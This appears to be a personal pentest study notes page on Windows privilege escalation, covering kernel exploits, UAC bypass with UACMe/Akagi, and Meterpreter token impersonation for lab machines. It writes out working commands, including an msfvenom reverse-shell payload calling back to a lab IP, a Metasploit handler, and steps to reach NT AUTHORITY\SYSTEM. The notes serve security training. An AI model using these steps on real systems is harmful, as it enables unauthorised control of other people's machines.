rootđź’€bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!

View on GitHub

Windows Kernel Exploit

Windows Kernel is the kernel that comes pre-packaged with all versions of microsoft Windows and operates as a traditional kernel with a few exceptions based on user design philosophy

Look for windows boxes that has the kernel exploit vuln(Devel)

one of the basic command to escalate priv esc on a windows is getsystem, this would go through a plethora of techniques, but it can also fail actually

Check out the Devel Box Writeup, it’s more of kernel exploit stuff.

Link to Devel Writeup

Bypassing UAC with UACMe

UAC(User Account Control), has been present in all of windows from windows vista to windows 11.

This is to ensure that changes to the operating system require approval from the administrator or a user account that is part of the local administrator group

UACMe is an open source tool that can be used to bypass Windows UAC by leveraging various techniques

You can get it here

To search for a running process

pgrep explorer

To migrate to that process, this provides a 64 bit meterpreter session

migrate 2223

To check if the user has elevated privileges

getprivs

To check users

net user

To check if the users are in the local administrators group

net localgroup administrators

The version of Akagi you’ll use depends on the version of windows you are running

To run akagi

Create a backdoor.exe using msfvenom

msfvenom -f exe -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -o backdoor.exe

Then set up the multi handler on metasploit

use exploit/multi/handler
set LHOST
set LPORT
run

Now, on the previous meterpreter shell you got, create a TEMP directory and upload the 2 files

upload backdoor.exe
upload Akagi64.exe

Making use of key “23”, which essentially takes advantage of package manager on windows

.\Akagi64.exe 23 C:\Temp\backdoor.exe

Running this bypasses UAC, then backdoor.exe should be executed with admin privileges ` You should get a metterpreter shell, checking the privileges again

getprivs

You’ll see the user has elevated privileges Listing out processes

ps

With this you can migrate to a process with “NT Authority\System”

migrate PID

With this you would get a meterpreter shell as “NT Authority System”

For windows 10, you can use key 33. Check out the documentation of the tool to read more about it

In order to elevate privileges by bypassing uac, you will need access to a user that is a member of the local administrators group

Access Token Impersonation

SeAssignPrimaryToken: This allows a user to impersonate tokens

SeCreateToken: This allows a user to create an arbitrary token with administrative privileges

SeImpersonatePrivilege: This allows a user to create a process under the security context of another user typically with administrative privileges

Using the “Incognito Module”, this is a built-in meterpreter module that was originally a standalone application that allows you to impersonate user tokens successfully after exploitation. We can use this to display a list of token we can impersonate

To migrate to a 64bit meterpreter after getting your meterpreter session, you can migrate to explorer

pgrep explorer
migrate 2222

if “SeImpersonatePrivilege” is present, you can load incognito module on your meterpreter

load incognito

To list tokens, (you should see delegation tokens and impersonation tokens)

list_tokens -u

To impersonate token

impersonate_token "name of the token"

to check if it worked

getuid

So you can check the tokens again

list_tokens -u

If there’s one for “NT Authority System”, you can go ahead and impersonate it

impersonate_token "name of the token"

If there’s ever a scenario where the delegation or impersonation token isn’t available, then you can go ahead with the potato attack